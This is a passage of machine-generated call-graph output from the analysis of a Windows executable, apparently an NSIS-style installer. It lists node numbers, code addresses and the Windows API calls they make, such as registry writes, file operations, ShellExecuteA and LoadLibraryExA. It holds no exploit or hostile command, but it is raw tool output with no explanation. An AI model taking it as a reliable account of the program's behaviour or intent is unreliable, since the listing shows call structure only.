GetPrivateProfileStringA 3877->3878 3574 401751 3575 402a3a 18 API calls 3574->3575 3576 401758 3575->3576 3577 401776 3576->3577 3578 40177e 3576->3578 3613 405e63 lstrcpynA 3577->3613 3614 405e63 lstrcpynA 3578->3614 3581 401789 3583 4058d5 3 API calls 3581->3583 3582 40177c 3585 4060ce 5 API calls 3582->3585 3584 40178f lstrcatA 3583->3584 3584->3582 3591 40179b 3585->3591 3586 406167 2 API calls 3586->3591 3587 405ab1 2 API calls 3587->3591 3589 4017b2 CompareFileTime 3589->3591 3590 401876 3592 40507c 25 API calls 3590->3592 3591->3586 3591->3587 3591->3589 3591->3590 3594 405e63 lstrcpynA 3591->3594 3600 405e85 18 API calls 3591->3600 3609 405659 MessageBoxIndirectA 3591->3609 3610 40184d 3591->3610 3612 405ad6 GetFileAttributesA CreateFileA 3591->3612 3595 401880 3592->3595 3593 40507c 25 API calls 3596 401862 3593->3596 3594->3591 3597 402f5c 45 API calls 3595->3597 3598 401893 3597->3598 3599 4018a7 SetFileTime 3598->3599 3601 4018b9 CloseHandle 3598->3601 3599->3601 3600->3591 3601->3596 3602 4018ca 3601->3602 3603 4018e2 3602->3603 3604 4018cf 3602->3604 3606 405e85 18 API calls 3603->3606 3605 405e85 18 API calls 3604->3605 3607 4018d7 lstrcatA 3605->3607 3608 4018ea 3606->3608 3607->3608 3611 405659 MessageBoxIndirectA 3608->3611 3609->3591 3610->3593 3610->3596 3611->3596 3612->3591 3613->3582 3614->3581 3889 401651 3890 402a3a 18 API calls 3889->3890 3891 401657 3890->3891 3892 406167 2 API calls 3891->3892 3893 40165d 3892->3893 3894 401951 3895 402a1d 18 API calls 3894->3895 3896 401958 3895->3896 3897 402a1d 18 API calls 3896->3897 3898 401962 3897->3898 3899 402a3a 18 API calls 3898->3899 3900 40196b 3899->3900 3901 40197e lstrlenA 3900->3901 3902 4019b9 3900->3902 3903 401988 3901->3903 3903->3902 3907 405e63 lstrcpynA 3903->3907 3905 4019a2 3905->3902 3906 4019af lstrlenA 3905->3906 3906->3902 3907->3905 3628 4021d2 3629 402a3a 18 API calls 3628->3629 3630 4021d8 3629->3630 3631 402a3a 18 API calls 3630->3631 3632 4021e1 3631->3632 3633 402a3a 18 API calls 3632->3633 3634 4021ea 3633->3634 3635 406167 2 API calls 3634->3635 3636 4021f3 3635->3636 3637 402204 lstrlenA lstrlenA 3636->3637 3638 4021f7 3636->3638 3640 40507c 25 API calls 3637->3640 3639 40507c 25 API calls 3638->3639 3642 4021ff 3638->3642 3639->3642 3641 402240 SHFileOperationA 3640->3641 3641->3638 3641->3642 3908 4019d2 3909 402a3a 18 API calls 3908->3909 3910 4019d9 3909->3910 3911 402a3a 18 API calls 3910->3911 3912 4019e2 3911->3912 3913 4019e9 lstrcmpiA 3912->3913 3914 4019fb lstrcmpA 3912->3914 3915 4019ef 3913->3915 3914->3915 3916 402254 3917 40225b 3916->3917 3920 40226e 3916->3920 3918 405e85 18 API calls 3917->3918 3919 402268 3918->3919 3921 405659 MessageBoxIndirectA 3919->3921 3921->3920 3922 4014d6 3923 402a1d 18 API calls 3922->3923 3924 4014dc Sleep 3923->3924 3926 4028cf 3924->3926 3927 4047d7 3928 404803 3927->3928 3929 4047e7 3927->3929 3931 404836 3928->3931 3932 404809 SHGetPathFromIDListA 3928->3932 3938 40563d GetDlgItemTextA 3929->3938 3934 404820 SendMessageA 3932->3934 3935 404819 3932->3935 3933 4047f4 SendMessageA 3933->3928 3934->3931 3937 40140b 2 API calls 3935->3937 3937->3934 3938->3933 3939 40155b 3940 402877 3939->3940 3943 405dc1 wsprintfA 3940->3943 3942 40287c 3943->3942 3944 40415c lstrcpynA lstrlenA 3945 40255c 3946 402a1d 18 API calls 3945->3946 3947 402566 3946->3947 3948 405b4e ReadFile 3947->3948 3949 4025d2 3947->3949 3950 4025e2 3947->3950 3953 4025d0 3947->3953 3948->3947 3954 405dc1 wsprintfA 3949->3954 3952 4025f8 SetFilePointer 3950->3952 3950->3953 3952->3953 3954->3953 3805 40205e 3806 402a3a 18 API calls 3805->3806 3807 402065 3806->3807 3808 402a3a 18 API calls 3807->3808 3809 40206f 3808->3809 3810 402a3a 18 API calls 3809->3810 3811 402079 3810->3811 3812 402a3a 18 API calls 3811->3812 3813 402083 3812->3813 3814 402a3a 18 API calls 3813->3814 3815 40208d 3814->3815 3816 4020cc CoCreateInstance 3815->3816 3817 402a3a 18 API calls 3815->3817 3820 4020eb 3816->3820 3822 402193 3816->3822 3817->3816 3818 401423 25 API calls 3819 4021c9 3818->3819 3821 402173 MultiByteToWideChar 3820->3821 3820->3822 3821->3822 3822->3818 3822->3819 3955 40265e 3956 402664 3955->3956 3957 402668 FindNextFileA 3956->3957 3959 40267a 3956->3959 3958 4026b9 3957->3958 3957->3959 3961 405e63 lstrcpynA 3958->3961 3961->3959 3962 401cde GetDlgItem GetClientRect 3963 402a3a 18 API calls 3962->3963 3964 401d0e LoadImageA SendMessageA 3963->3964 3965 401d2c DeleteObject 3964->3965 3966 4028cf 3964->3966 3965->3966 3967 401662 3968 402a3a 18 API calls 3967->3968 3969 401669 3968->3969 3970 402a3a 18 API calls 3969->3970 3971 401672 3970->3971 3972 402a3a 18 API calls 3971->3972 3973 40167b MoveFileA 3972->3973 3974 401687 3973->3974 3975 40168e 3973->3975 3976 401423 25 API calls 3974->3976 3977 406167 2 API calls 3975->3977 3979 4021c9 3975->3979 3976->3979 3978 40169d 3977->3978 3978->3979 3980 405d1e 38 API calls 3978->3980 3980->3974 3057 402364 3058 40236a 3057->3058 3059 402a3a 18 API calls 3058->3059 3060 40237c 3059->3060 3061 402a3a 18 API calls 3060->3061 3062 402386 RegCreateKeyExA 3061->3062 3063 4023b0 3062->3063 3064 4028cf 3062->3064 3065 4023c8 3063->3065 3066 402a3a 18 API calls 3063->3066 3067 4023d4 3065->3067 3069 402a1d 18 API calls 3065->3069 3068 4023c1 lstrlenA 3066->3068 3070 4023ef RegSetValueExA 3067->3070 3074 402f5c 3067->3074 3068->3065 3069->3067 3072 402405 RegCloseKey 3070->3072 3072->3064 3075 402f87 3074->3075 3076 402f6b SetFilePointer 3074->3076 3089 403064 GetTickCount 3075->3089 3076->3075 3079 403024 3079->3070 3082 403064 43 API calls 3083 402fbe 3082->3083 3083->3079 3084 40302a ReadFile 3083->3084 3086 402fcd 3083->3086 3084->3079 3086->3079 3087 405b4e ReadFile 3086->3087 3104 405b7d WriteFile 3086->3104 3087->3086 3090 403092 3089->3090 3091 4031bc 3089->3091 3106 4031e3 SetFilePointer 3090->3106 3092 402c17 33 API calls 3091->3092 3099 402f8e 3092->3099 3094 40309d SetFilePointer 3098 4030c2 3094->3098 3098->3099 3100 405b7d WriteFile 3098->3100 3101 40319d SetFilePointer 3098->3101 3107 4031cd 3098->3107 3110 4062ff 3098->3110 3117 402c17 3098->3117 3099->3079 3102 405b4e ReadFile 3099->3102 3100->3098 3101->3091 3103 402fa7 3102->3103 3103->3079 3103->3082 3105 405b9b 3104->3105 3105->3086 3106->3094 3108 405b4e ReadFile 3107->3108 3109 4031e0 3108->3109 3109->3098 3111 406324 3110->3111 3114 40632c 3110->3114 3111->3098 3112 4063b3 GlobalFree 3113 4063bc GlobalAlloc 3112->3113 3113->3111 3113->3114 3114->3111 3114->3112 3114->3113 3115 406433 GlobalAlloc 3114->3115 3116 40642a GlobalFree 3114->3116 3115->3111 3115->3114 3116->3115 3118 402c25 3117->3118 3119 402c3d 3117->3119 3120 402c2e DestroyWindow 3118->3120 3123 402c35 3118->3123 3121 402c45 3119->3121 3122 402c4d GetTickCount 3119->3122 3120->3123 3124 406238 2 API calls 3121->3124 3122->3123 3125 402c5b 3122->3125 3123->3098 3124->3123 3126 402c90 CreateDialogParamA ShowWindow 3125->3126 3127 402c63 3125->3127 3126->3123 3127->3123 3132 402bfb 3127->3132 3129 402c71 wsprintfA 3130 40507c 25 API calls 3129->3130 3131 402c8e 3130->3131 3131->3123 3133 402c0a 3132->3133 3134 402c0c MulDiv 3132->3134 3133->3134 3134->3129 3135 401567 3136 401577 ShowWindow 3135->3136 3137 40157e 3135->3137 3136->3137 3138 40158c ShowWindow 3137->3138 3139 4028cf 3137->3139 3138->3139 3995 401dea 3996 402a3a 18 API calls 3995->3996 3997 401df0 3996->3997 3998 402a3a 18 API calls 3997->3998 3999 401df9 3998->3999 4000 402a3a 18 API calls 3999->4000 4001 401e02 4000->4001 4002 402a3a 18 API calls 4001->4002 4003 401e0b 4002->4003 4004 401423 25 API calls 4003->4004 4005 401e12 ShellExecuteA 4004->4005 4006 401e3f 4005->4006 4014 401eee 4015 402a3a 18 API calls 4014->4015 4016 401ef5 4015->4016 4017 4061fc 5 API calls 4016->4017 4018 401f04 4017->4018 4019 401f1c GlobalAlloc 4018->4019 4020 401f84 4018->4020 4019->4020 4021 401f30 4019->4021 4022 4061fc 5 API calls 4021->4022 4023 401f37 4022->4023 4024 4061fc 5 API calls 4023->4024 4025 401f41 4024->4025 4025->4020 4029 405dc1 wsprintfA 4025->4029 4027 401f78 4030 405dc1 wsprintfA 4027->4030 4029->4027 4030->4020 4031 404ff0 4032 405000 4031->4032 4033 405014 4031->4033 4034 405006 4032->4034 4035 40505d 4032->4035 4036 40501c IsWindowVisible 4033->4036 4042 405033 4033->4042 4038 404094 SendMessageA 4034->4038 4037 405062 CallWindowProcA 4035->4037 4036->4035 4039 405029 4036->4039 4041 405010 4037->4041 4038->4041 4044 404947 SendMessageA 4039->4044 4042->4037 4049 4049c7 4042->4049 4045 4049a6 SendMessageA 4044->4045 4046 40496a GetMessagePos ScreenToClient SendMessageA 4044->4046 4047 40499e 4045->4047 4046->4047 4048 4049a3 4046->4048 4047->4042 4048->4045 4058 405e63 lstrcpynA 4049->4058 4051 4049da 4059 405dc1 wsprintfA 4051->4059 4053 4049e4 4054 40140b 2 API calls 4053->4054 4055 4049ed 4054->4055 4060 405e63 lstrcpynA 4055->4060 4057 4049f4 4057->4035 4058->4051 4059->4053 4060->4057 4061 4014f0 SetForegroundWindow 4062 4028cf 4061->4062 3615 4036f1 3616 403702 CloseHandle 3615->3616 3617 40370c 3615->3617 3616->3617 3618 403720 3617->3618 3619 403716 CloseHandle 3617->3619 3624 40374e 3618->3624 3619->3618 3622 405705 69 API calls 3623 403731 3622->3623 3625 40375c 3624->3625 3626 403761 FreeLibrary GlobalFree 3625->3626 3627 403725 3625->3627 3626->3626 3626->3627 3627->3622 3663 403b75 3664 403cc8 3663->3664 3665 403b8d 3663->3665 3667 403d19 3664->3667 3668 403cd9 GetDlgItem GetDlgItem 3664->3668 3665->3664 3666 403b99 3665->3666 3669 403ba4 SetWindowPos 3666->3669 3670 403bb7 3666->3670 3672 403d73 3667->3672 3677 401389 2 API calls 3667->3677 3671 404048 19 API calls 3668->3671 3669->3670 3674 403bd4 3670->3674 3675 403bbc ShowWindow 3670->3675 3676 403d03 SetClassLongA 3671->3676 3673 404094 SendMessageA 3672->3673 3693 403cc3 3672->3693 3700 403d85 3673->3700 3678 403bf6 3674->3678 3679 403bdc DestroyWindow 3674->3679 3675->3674 3680 40140b 2 API calls 3676->3680 3681 403d4b 3677->3681 3682 403bfb SetWindowLongA 3678->3682 3683 403c0c 3678->3683 3732 403fd1 3679->3732 3680->3667 3681->3672 3686 403d4f SendMessageA 3681->3686 3682->3693 3684 403cb5 3683->3684 3685 403c18 GetDlgItem 3683->3685 3742 4040af 3684->3742 3689 403c48 3685->3689 3690 403c2b SendMessageA IsWindowEnabled 3685->3690 3686->3693 3687 40140b 2 API calls 3687->3700 3688 403fd3 DestroyWindow KiUserCallbackDispatcher 3688->3732 3695 403c55 3689->3695 3696 403c9c SendMessageA 3689->3696 3697 403c68 3689->3697 3707 403c4d 3689->3707 3690->3689 3690->3693 3692 404002 ShowWindow 3692->3693 3694 405e85 18 API calls 3694->3700 3695->3696 3695->3707 3696->3684 3701 403c70 3697->3701 3702 403c85 3697->3702 3699 404048 19 API calls 3699->3700 3700->3687 3700->3688 3700->3693 3700->3694 3700->3699 3723 403f13 DestroyWindow 3700->3723 3733 404048 3700->3733 3705 40140b 2 API calls 3701->3705 3704 40140b 2 API calls 3702->3704 3703 403c83 3703->3684 3706 403c8c 3704->3706 3705->3707 3706->3684 3706->3707 3739 404021 3707->3739 3709 403e00 GetDlgItem 3710 403e15 3709->3710 3711 403e1d ShowWindow KiUserCallbackDispatcher 3709->3711 3710->3711 3736 40406a KiUserCallbackDispatcher 3711->3736 3713 403e47 EnableWindow 3716 403e5b 3713->3716 3714 403e60 GetSystemMenu EnableMenuItem SendMessageA 3715 403e90 SendMessageA 3714->3715 3714->3716 3715->3716 3716->3714 3737 40407d SendMessageA 3716->3737 3738 405e63 lstrcpynA 3716->3738 3719 403ebe lstrlenA 3720 405e85 18 API calls 3719->3720 3721 403ecf SetWindowTextA 3720->3721 3722 401389 2 API calls 3721->3722 3722->3700 3724 403f2d CreateDialogParamA 3723->3724 3723->3732 3725 403f60 3724->3725 3724->3732 3726 404048 19 API calls 3725->3726 3727 403f6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3726->3727 3728 401389 2 API calls 3727->3728 3729 403fb1 3728->3729 3729->3693 3730 403fb9 ShowWindow 3729->3730 3731 404094 SendMessageA 3730->3731 3731->3732 3732->3692 3732->3693 3734 405e85 18 API calls 3733->3734 3735 404053 SetDlgItemTextA 3734->3735 3735->3709 3736->3713 3737->3716 3738->3719 3740 404028 3739->3740 3741 40402e SendMessageA 3739->3741 3740->3741 3741->3703 3743 4040c7 GetWindowLongA 3742->3743 3753 404150 3742->3753 3744 4040d8 3743->3744 3743->3753 3745 4040e7 GetSysColor 3744->3745 3746 4040ea 3744->3746 3745->3746 3747 4040f0 SetTextColor 3746->3747 3748 4040fa SetBkMode 3746->3748 3747->3748 3749 404112 GetSysColor 3748->3749 3750 404118 3748->3750 3749->3750 3751 404129 3750->3751 3752 40411f SetBkColor 3750->3752 3751->3753 3754 404143 CreateBrushIndirect 3751->3754 3755 40413c DeleteObject 3751->3755 3752->3751 3753->3693 3754->3753 3755->3754 4068 4018f5 4069 40192c 4068->4069 4070 402a3a 18 API calls 4069->4070 4071 401931 4070->4071 4072 405705 69 API calls 4071->4072 4073 40193a 4072->4073 4074 4024f7 4075 402a3a 18 API calls 4074->4075 4076 4024fe 4075->4076 4079 405ad6 GetFileAttributesA CreateFileA 4076->4079 4078 40250a 4079->4078 4080 4018f8 4081 402a3a 18 API calls 4080->4081 4082 4018ff 4081->4082 4083 405659 MessageBoxIndirectA 4082->4083 4084 401908 4083->4084 4085 4049f9 GetDlgItem GetDlgItem 4086 404a4b 7 API calls 4085->4086 4098 404c63 4085->4098 4087 404ae1 SendMessageA 4086->4087 4088 404aee DeleteObject 4086->4088 4087->4088 4089 404af7 4088->4089 4090 404b2e 4089->4090 4092 405e85 18 API calls 4089->4092 4093 404048 19 API calls 4090->4093 4091 404d47 4094 404df3 4091->4094 4100 404c56 4091->4100 4105 404da0 SendMessageA 4091->4105 4095 404b10 SendMessageA SendMessageA 4092->4095 4099 404b42 4093->4099 4096 404e05 4094->4096 4097 404dfd SendMessageA 4094->4097 4095->4089 4107 404e17 ImageList_Destroy 4096->4107 4108 404e1e 4096->4108 4115 404e2e 4096->4115 4097->4096 4098->4091 4103 404947 5 API calls 4098->4103 4119 404cd4 4098->4119 4104 404048 19 API calls 4099->4104 4101 4040af 8 API calls 4100->4101 4106 404fe9 4101->4106 4102 404d39 SendMessageA 4102->4091 4103->4119 4120 404b50 4104->4120 4105->4100 4110 404db5 SendMessageA 4105->4110 4107->4108 4111 404e27 GlobalFree 4108->4111 4108->4115 4109 404f9d 4109->4100 4116 404faf ShowWindow GetDlgItem ShowWindow 4109->4116 4113 404dc8 4110->4113 4111->4115 4112 404c24 GetWindowLongA SetWindowLongA 4114 404c3d 4112->4114 4121 404dd9 SendMessageA 4113->4121 4117 404c43 ShowWindow 4114->4117 4118 404c5b 4114->4118 4115->4109 4126 4049c7 4 API calls 4115->4126 4129 404e69 4115->4129 4116->4100 4136 40407d SendMessageA 4117->4136 4137 40407d SendMessageA 4118->4137 4119->4091 4119->4102 4120->4112 4122 404c1e 4120->4122 4125 404b9f SendMessageA 4120->4125 4127 404bdb SendMessageA 4120->4127 4128 404bec SendMessageA 4120->4128 4121->4094 4122->4112 4122->4114 4125->4120 4126->4129 4127->4120 4128->4120 4131 404ead 4129->4131 4132 404e97 SendMessageA 4129->4132 4130 404f73 InvalidateRect 4130->4109 4133 404f89 4130->4133 4131->4130 4135 404f21 SendMessageA SendMessageA 4131->4135 4132->4131 4138 404902 4133->4138 4135->4131 4136->4100 4137->4098 4141 40483d 4138->4141 4140 404917 4140->4109 4142 404853 4141->4142 4143 405e85 18 API calls 4142->4143 4144 4048b7 4143->4144 4145 405e85 18 API calls 4144->4145 4146 4048c2 4145->4146 4147 405e85 18 API calls 4146->4147 4148 4048d8 lstrlenA wsprintfA SetDlgItemTextA 4147->4148 4148->4140 4156 4014fe 4157 401506 4156->4157 4159 401519 4156->4159 4158 402a1d 18 API calls 4157->4158 4158->4159 4160 401000 4161 401037 BeginPaint GetClientRect 4160->4161 4162 40100c DefWindowProcA 4160->4162 4164 4010f3 4161->4164 4165 401179 4162->4165 4166 401073 CreateBrushIndirect FillRect DeleteObject 4164->4166 4167 4010fc 4164->4167 4166->4164 4168 401102 CreateFontIndirectA 4167->4168 4169 401167 EndPaint 4167->4169 4168->4169 4170 401112 6 API calls 4168->4170 4169->4165 4170->4169 2949 402482 2960 402b44 2949->2960 2951 40248c 2964 402a1d 2951->2964 2953 402495 2954 40249f 2953->2954 2958 4026a6 2953->2958 2955 4024b8 RegEnumValueA 2954->2955 2956 4024ac RegEnumKeyA 2954->2956 2957 4024d1 RegCloseKey 2955->2957 2955->2958 2956->2957 2957->2958 2967 402a3a 2960->2967 2962 402b5d 2963 402b6b RegOpenKeyExA 2962->2963 2963->2951 2965 405e85 18 API calls 2964->2965 2966 402a31 2965->2966 2966->2953 2968 402a46 2967->2968 2973 405e85 2968->2973 2971 402a73 2971->2962 2974 405e92 2973->2974 2975 4060b5 2974->2975 2978 405f33 GetVersion 2974->2978 2979 40608c lstrlenA 2974->2979 2980 405e85 10 API calls 2974->2980 2984 405fab GetSystemDirectoryA 2974->2984 2985 405fbe GetWindowsDirectoryA 2974->2985 2986 4060ce 5 API calls 2974->2986 2987 405e85 10 API calls 2974->2987 2988 406035 lstrcatA 2974->2988 2989 405ff2 SHGetSpecialFolderLocation 2974->2989 3000 405d4a RegOpenKeyExA 2974->3000 3005 405dc1 wsprintfA 2974->3005 3006 405e63 lstrcpynA 2974->3006 2976 402a67 2975->2976 3007 405e63 lstrcpynA 2975->3007 2976->2971 2991 4060ce 2976->2991 2978->2974 2979->2974 2980->2979 2984->2974 2985->2974 2986->2974 2987->2974 2988->2974 2989->2974 2990 40600a SHGetPathFromIDListA CoTaskMemFree 2989->2990 2990->2974 2997 4060da 2991->2997 2992 406146 CharPrevA 2993 406142 2992->2993 2993->2992 2995 406161 2993->2995 2994 406137 CharNextA 2994->2993 2994->2997 2995->2971 2997->2993 2997->2994 2998 406125 CharNextA 2997->2998 2999 406132 CharNextA 2997->2999 3008 405900 2997->3008 2998->2997 2999->2994 3001 405dbb 3000->3001 3002 405d7d RegQueryValueExA 3000->3002 3001->2974 3003 405d9e RegCloseKey 3002->3003 3003->3001 3005->2974 3006->2974 3007->2976 3009 405906 3008->3009 3010 405919 3009->3010 3011 40590c CharNextA 3009->3011 3010->2997 3011->3009 4171 401b02 4172 402a3a 18 API calls 4171->4172 4173 401b09 4172->4173 4174 402a1d 18 API calls 4173->4174 4175 401b12 wsprintfA 4174->4175 4176 4028cf 4175->4176 3012 402283 3013 402291 3012->3013 3014 40228b 3012->3014 3016 4022a1 3013->3016 3018 402a3a 18 API calls 3013->3018 3015 402a3a 18 API calls 3014->3015 3015->3013 3017 4022af 3016->3017 3019 402a3a 18 API calls 3016->3019 3020 402a3a 18 API calls 3017->3020 3018->3016 3019->3017 3021 4022b8 WritePrivateProfileStringA 3020->3021 4177 401a03 4178 402a3a 18 API calls 4177->4178 4179 401a0c ExpandEnvironmentStringsA 4178->4179 4180 401a20 4179->4180 4182 401a33 4179->4182 4181 401a25 lstrcmpA 4180->4181 4180->4182 4181->4182 4183 404486 4184 4044b2 4183->4184 4185 4044c3 4183->4185 4244 40563d GetDlgItemTextA 4184->4244 4187 4044cf GetDlgItem 4185->4187 4190 40452e 4185->4190 4189 4044e3 4187->4189 4188 4044bd 4191 4060ce 5 API calls 4188->4191 4192 4044f7 SetWindowTextA 4189->4192 4195 40596e 4 API calls 4189->4195 4197 405e85 18 API calls 4190->4197 4205 404612 4190->4205 4242 4047bc 4190->4242 4191->4185 4196 404048 19 API calls 4192->4196 4194 4040af 8 API calls 4199 4047d0 4194->4199 4203 4044ed 4195->4203 4200 404513 4196->4200 4201 4045a2 SHBrowseForFolderA 4197->4201 4198 404642 4202 4059c3 18 API calls 4198->4202 4204 404048 19 API calls 4200->4204 4201->4205 4206 4045ba CoTaskMemFree 4201->4206 4207 404648 4202->4207 4203->4192 4210 4058d5 3 API calls 4203->4210 4208 404521 4204->4208 4205->4242 4246 40563d GetDlgItemTextA 4205->4246 4209 4058d5 3 API calls 4206->4209 4247 405e63 lstrcpynA 4207->4247 4245 40407d SendMessageA 4208->4245 4212 4045c7 4209->4212 4210->4192 4215 4045fe SetDlgItemTextA 4212->4215 4219 405e85 18 API calls 4212->4219 4214 404527 4217 4061fc 5 API calls 4214->4217 4215->4205 4216 40465f 4218 4061fc 5 API calls 4216->4218 4217->4190 4226 404666 4218->4226 4220 4045e6 lstrcmpiA 4219->4220 4220->4215 4223 4045f7 lstrcatA 4220->4223 4221 4046a2 4248 405e63 lstrcpynA 4221->4248 4223->4215 4224 4046a9 4225 40596e 4 API calls 4224->4225 4227 4046af GetDiskFreeSpaceA 4225->4227 4226->4221 4230 40591c 2 API calls 4226->4230 4232 4046fa 4226->4232 4229 4046d3 MulDiv 4227->4229 4227->4232 4229->4232 4230->4226 4231 40476b 4234 40478e 4231->4234 4236 40140b 2 API calls 4231->4236 4232->4231 4233 404902 21 API calls 4232->4233 4235 404758 4233->4235 4249 40406a KiUserCallbackDispatcher 4234->4249 4237 40476d SetDlgItemTextA 4235->4237 4238 40475d 4235->4238 4236->4234 4237->4231 4241 40483d 21 API calls 4238->4241 4240 4047aa 4240->4242 4250 40441b 4240->4250 4241->4231 4242->4194 4244->4188 4245->4214 4246->4198 4247->4216 4248->4224 4249->4240 4251 404429 4250->4251 4252 40442e SendMessageA 4250->4252 4251->4252 4252->4242 3140 402308 3141 402338 3140->3141 3142 40230d 3140->3142 3144 402a3a 18 API calls 3141->3144 3143 402b44 19 API calls 3142->3143 3146 402314 3143->3146 3145 40233f 3144->3145 3152 402a7a RegOpenKeyExA 3145->3152 3147 40231e 3146->3147 3149 402355 3146->3149 3148 402a3a 18 API calls 3147->3148 3151 402325 RegDeleteValueA RegCloseKey 3148->3151 3151->3149 3153 402b0e 3152->3153 3158 402aa5 3152->3158 3153->3149 3154 402acb RegEnumKeyA 3155 402add RegCloseKey 3154->3155 3154->3158 3163 4061fc GetModuleHandleA 3155->3163 3157 402b02 RegCloseKey 3162 402af1 3157->3162 3158->3154 3158->3155 3158->3157 3160 402a7a 5 API calls 3158->3160 3160->3158 3161 402b1d RegDeleteKeyA 3161->3162 3162->3153 3164 406222 GetProcAddress 3163->3164 3165 406218 3163->3165 3166 402aed 3164->3166 3169 40618e GetSystemDirectoryA 3165->3169 3166->3161 3166->3162 3168 40621e 3168->3164 3168->3166 3170 4061b0 wsprintfA LoadLibraryExA 3169->3170 3170->3168 4253 402688 4254 402a3a 18 API calls 4253->4254 4255 40268f FindFirstFileA 4254->4255 4256 4026b2 4255->4256 4260 4026a2 4255->4260 4257 4026b9 4256->4257 4261 405dc1 wsprintfA 4256->4261 4262 405e63 lstrcpynA 4257->4262 4261->4257 4262->4260 4263 401c8a 4264 402a1d 18 API calls 4263->4264 4265 401c90 IsWindow 4264->4265 4266 4019f3 4265->4266 3541 401f90 3542 401fa2 3541->3542 3552 402050 3541->3552 3543 402a3a 18 API calls 3542->3543 3545 401fa9 3543->3545 3544 401423 25 API calls 3548 4021c9 3544->3548 3546 402a3a 18 API calls 3545->3546 3547 401fb2 3546->3547 3549 401fc7 LoadLibraryExA 3547->3549 3550 401fba GetModuleHandleA 3547->3550 3551 401fd7 GetProcAddress 3549->3551 3549->3552 3550->3549 3550->3551 3553 402023 3551->3553 3554 401fe6 3551->3554 3552->3544 3555 40507c 25 API calls 3553->3555 3557 401ff6 3554->3557 3559 401423 3554->3559 3555->3557 3557->3548 3558 402044 FreeLibrary 3557->3558 3558->3548 3560 40507c 25 API calls 3559->3560 3561 401431 3560->3561 3561->3557 3562 402410 3563 402b44 19 API calls 3562->3563 3564 40241a 3563->3564 3565 402a3a 18 API calls 3564->3565 3566 402423 3565->3566 3567 40242d RegQueryValueExA 3566->3567 3570 4026a6 3566->3570 3568 402453 RegCloseKey 3567->3568 3569 40244d 3567->3569 3568->3570 3569->3568 3573 405dc1 wsprintfA 3569->3573 3573->3568 4267 401490 4268 40507c 25 API calls 4267->4268 4269 401497 4268->4269 4270 404191 4271 4041a7 4270->4271 4279 4042b3 4270->4279 4273 404048 19 API calls 4271->4273 4272 404322 4274 4043f6 4272->4274 4275 40432c GetDlgItem 4272->4275 4276 4041fd 4273->4276 4282 4040af 8 API calls 4274->4282 4277 404342 4275->4277 4278 4043b4 4275->4278 4281 404048 19 API calls 4276->4281 4277->4278 4285 404368 6 API calls 4277->4285 4278->4274 4286 4043c6 4278->4286 4279->4272 4279->4274 4280 4042f7 GetDlgItem SendMessageA 4279->4280 4301 40406a KiUserCallbackDispatcher 4280->4301 4284 40420a CheckDlgButton 4281->4284 4293 4043f1 4282->4293 4299 40406a KiUserCallbackDispatcher 4284->4299 4285->4278 4289 4043cc SendMessageA 4286->4289 4290 4043dd 4286->4290 4287 40431d 4291 40441b SendMessageA 4287->4291 4289->4290 4290->4293 4294 4043e3 SendMessageA 4290->4294 4291->4272 4292 404228 GetDlgItem 4300 40407d SendMessageA 4292->4300 4294->4293 4296 40423e SendMessageA 4297 404265 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4296->4297 4298 40425c GetSysColor 4296->4298 4297->4293 4298->4297 4299->4292 4300->4296 4301->4287 4309 401595 4310 402a3a 18 API calls 4309->4310 4311 40159c SetFileAttributesA 4310->4311 4312 4015ae 4311->4312 4313 401717 4314 402a3a 18 API calls 4313->4314 4315 40171e SearchPathA 4314->4315 4316 401739 4315->4316 4317 402519 4318 40252e 4317->4318 4319 40251e 4317->4319 4321 402a3a 18 API calls 4318->4321 4320 402a1d 18 API calls 4319->4320 4322 402527 4320->4322 4323 402535 lstrlenA 4321->4323 4324 405b7d WriteFile 4322->4324 4325 402557 4322->4325 4323->4322 4324->4325 4326 402b9c 4327 402bdf SetDlgItemTextA 4326->4327 4328 402b9f 4326->4328 4329 402bf5 4327->4329 4328->4329 4330 402bfb MulDiv 4328->4330 4331 402bb5 wsprintfA SetWindowTextA 4330->4331 4331->4327 4333 40149d 4334 4014ab PostQuitMessage 4333->4334 4335 40226e 4333->4335 4334->4335 4336 4037a1 4337 4037ac 4336->4337 4338 4037b0 4337->4338 4339 4037b3 GlobalAlloc 4337->4339 4339->4338 4340 406ba1 4343 406332 4340->4343 4341 4063b3 GlobalFree 4342 4063bc GlobalAlloc 4341->4342 4342->4343 4344 406c9d 4342->4344 4343->4341 4343->4342 4343->4343 4343->4344 4345 406433 GlobalAlloc 4343->4345 4346 40642a GlobalFree 4343->4346 4345->4343 4345->4344 4346->4345 4347 401b23 4348 401b30 4347->4348 4349 401b74 4347->4349 4350 401bb8 4348->4350 4356 401b47 4348->4356 4351 401b78 4349->4351 4352 401b9d GlobalAlloc 4349->4352 4354 405e85 18 API calls 4350->4354 4358 40226e 4350->4358 4351->4358 4368 405e63 lstrcpynA 4351->4368 4353 405e85 18 API calls 4352->4353 4353->4350 4357 402268 4354->4357 4366 405e63 lstrcpynA 4356->4366 4361 405659 MessageBoxIndirectA 4357->4361 4359 401b8a GlobalFree 4359->4358 4361->4358 4362 401b56 4367 405e63 lstrcpynA 4362->4367 4364 401b65 4369 405e63 lstrcpynA 4364->4369 4366->4362 4367->4364 4368->4359 4369->4358 4370 401ca7 4371 402a1d 18 API calls 4370->4371 4372 401cae 4371->4372 4373 402a1d 18 API calls 4372->4373 4374 401cb6 GetDlgItem 4373->4374 4375 402513 4374->4375 3172 40192a 3173 40192c 3172->3173 3174 402a3a 18 API calls 3173->3174 3175 401931 3174->3175 3178 405705 3175->3178 3215 4059c3 3178->3215 3181 405744 3183 405872 3181->3183 3229 405e63 lstrcpynA 3181->3229 3182 40572d DeleteFileA 3211 40193a 3182->3211 3183->3211 3247 406167 FindFirstFileA 3183->3247 3185 40576a 3186 405770 lstrcatA 3185->3186 3187 40577d 3185->3187 3189 405783 3186->3189 3230 40591c lstrlenA 3187->3230 3192 405791 lstrcatA 3189->3192 3193 40579c lstrlenA FindFirstFileA 3189->3193 3192->3193 3193->3183 3202 4057c0 3193->3202 3196 405900 CharNextA 3196->3202 3197 4056bd 5 API calls 3198 4058ac 3197->3198 3199 4058b0 3198->3199 3200 4058c6 3198->3200 3206 40507c 25 API calls 3199->3206 3199->3211 3204 40507c 25 API calls 3200->3204 3201 405851 FindNextFileA 3201->3202 3205 405869 FindClose 3201->3205 3202->3196 3202->3201 3210 405705 62 API calls 3202->3210 3212 40507c 25 API calls 3202->3212 3213 40507c 25 API calls 3202->3213 3234 405e63 lstrcpynA 3202->3234 3235 4056bd 3202->3235 3243 405d1e 